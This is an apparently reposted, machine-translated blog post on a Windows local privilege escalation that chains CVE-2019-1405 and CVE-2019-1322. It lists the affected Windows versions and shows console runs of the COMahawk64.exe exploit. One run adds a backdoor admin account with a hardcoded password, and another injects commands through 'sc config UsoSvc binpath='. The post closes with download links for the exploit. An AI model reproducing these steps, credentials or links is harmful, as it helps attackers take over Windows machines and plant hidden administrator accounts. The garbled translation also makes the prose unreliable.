Windows provide the right tools CVE-2019-1405 & CVE-2019-1322

Others 2020-02-14 15:05:12 views: null

Vulnerabilities Introduction

Two by the NCC Group researchers discovered vulnerability illegal to mention the right of local services through COM. The first vulnerability CVE-2019-1405 is a logic error in the COM service that allows local users to execute arbitrary commands with ordinary LOCAL SERVICE identity. The second vulnerability CVE-2019-1322 is a simple service configuration error that allows any local user group reconfiguration SERVICE service is running as SYSTEM (This vulnerability has also been found by other researchers). When two or more vulnerabilities together, it allows ordinary users to local SYSTEM privileges to execute arbitrary commands.

A comprehensive inspection of a number of Windows services, find all users LOCAL SERVICE NETWORK SERVICE or running, can execute such attacks. Including the front of the UPnP Device Host service we mentioned, so that we can at any local user, combined with CVE-2019-1405 and CVE-2019-1322 both vulnerabilities, success in Windows 10 (1803 Dao 1903) will elevate system privileges to sYSTEM user.

Vulnerability version

Vendor Product Versions
Microsoft Windows 10 -, 1607, 1709, 1803, 1809, 1903
Microsoft Windows 7 -
Microsoft Windows 8.1 -
Microsoft Windows Rt 8.1 -
Microsoft Windows Server 2008 -, R2
Microsoft Windows Server 2012 -, R2
Microsoft Windows Server 2016 -, 1803, 1903
Microsoft Windows Server 2019 -

The default privilege escalation

C:\Users\null\Desktop>COMahawk64.exe
[\] Progress:  1/9 2/9 3/9 4/9 5/9 6/9 7/9 8/9 9/9
[+] Hopefully k8gege:K8gege520 is added as an admin.

C:\Users\null\Desktop>net user

\\DESKTOP-3F42O5D 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
k8gege                   null                     WDAGUtilityAccount
命令成功完成。

Specified command

C:\Users\null\Desktop>COMahawk64.exe "net user k8gege K8gege123? /add"
[+] Executing command [ sc config UsoSvc binpath= "cmd.exe /c net user k8gege K8gege123? /add" ]
[\] Progress:  1/6 2/6 3/6 4/6 5/6 6/6
[+] Command executed.
C:\Users\null\Desktop>net user

\\DESKTOP-3F42O5D 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
k8gege                   null                     WDAGUtilityAccount
命令成功完成。

Win10 mention the right

Teston Win10 X64 1803

Exp

https://github.com/apt69/COMahawk

https://github.com/k8gege/K8tools/raw/master/Comahawk.rar

Guess you like

Origin www.cnblogs.com/k8gege/p/12307400.html
Recommended
Open Source Daily | Linus declares war on "passive voice"; the big language model that understands human nature best; native Hongmeng is a new technical framework; open source version of Bloomberg terminal; big model "eats free food hard"
Ranking
Flutter-desktop
container 和container-fluid
One point nearly three cut Long Baoying skills invitation code 88118877
jsonEditor usage
Installation and use of Git (super detailed tutorial)
深入理解Moby Buildkit系列 #25 - Pipe设计原理
flinkcdc data collection code FlinkAPI
[Problem] Record compile-time error cordova: CordovaLib: _internal_aapt2_binary
Idea view properties Chinese into unicode code how to solve
mpvue build WeChat applet project
Daily
More
2024-10-09(1)
2024-10-08(1)
2024-10-07(1)
2024-10-06(15)
2024-10-05(7)
2024-10-04(1)
2024-10-03(7)
2024-10-02(1)
2024-10-01(0)
2024-09-30(0)

Code World

© 2018 codetd.com